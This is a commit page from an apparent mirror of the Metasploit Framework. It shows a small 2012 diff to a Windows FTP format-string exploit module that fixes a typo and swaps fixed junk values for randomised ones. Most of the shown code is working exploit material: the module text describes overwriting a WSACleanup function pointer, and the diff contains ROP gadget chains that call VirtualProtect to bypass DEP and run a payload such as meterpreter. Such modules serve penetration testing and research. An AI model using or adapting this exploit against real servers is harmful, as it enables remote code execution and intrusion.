infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Correct typo. Also make use of random junks.

unstable
sinn3r 2012-06-14 14:17:57 -05:00
parent 8e06babbba
commit b107025860
1 changed files with 8 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
View File

@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
crafted format string specifier as a username. The crafted username is sent to to the server to
overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
The SEH exit function is prefered so that the administrators are not left with an unhandled
The SEH exit function is preferred so that the administrators are not left with an unhandled
exception message. When using the meterpreter payload, the process will never die, allowing
for continuous exploitation.
},
@ -100,6 +100,9 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
end
def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end
def exploit
@ -110,12 +113,12 @@ class Metasploit3 < Msf::Exploit::Remote
0x77be3adb, # pop eax ; retn
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # mov eax,[eax] ; pop ebp ; retn
0x41414141, # junk ------------^
junk,
0x77bb0c86, # xchg eax,esi ; retn
0x77be3adb, # pop eax ; retn
0xFFFFFBFF, # dwSize
0x77BAD64D, # neg eax ; pop ebp ; retn
0x41414141, # junk ------^
junk,
0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn
0x77bbfc02, # pop ecx ; retn
0x77bef001, # ptr that is w+
@ -137,14 +140,14 @@ class Metasploit3 < Msf::Exploit::Remote
0x77C21D16, # pop eax ; retn
0x77C11120, # <- *&VirtualProtect()
0x77C2E493, # mov eax,[eax] ; pop ebp ; retn
0x41414141, # junk ------------^
junk,
0x77C21891, # pop esi ; retn
0x77C5D010, # ptr that is w+
0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn
0x77C21D16, # pop eax ; retn
0xFFFFFBFF, # dwSize
0x77C1BE18, # neg eax ; pop ebp ; retn
0x41414141, # junk ------^
junk,
0x77C2362C, # pop ebx ; retn
0x77C5D010, # ptr that is w+
0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn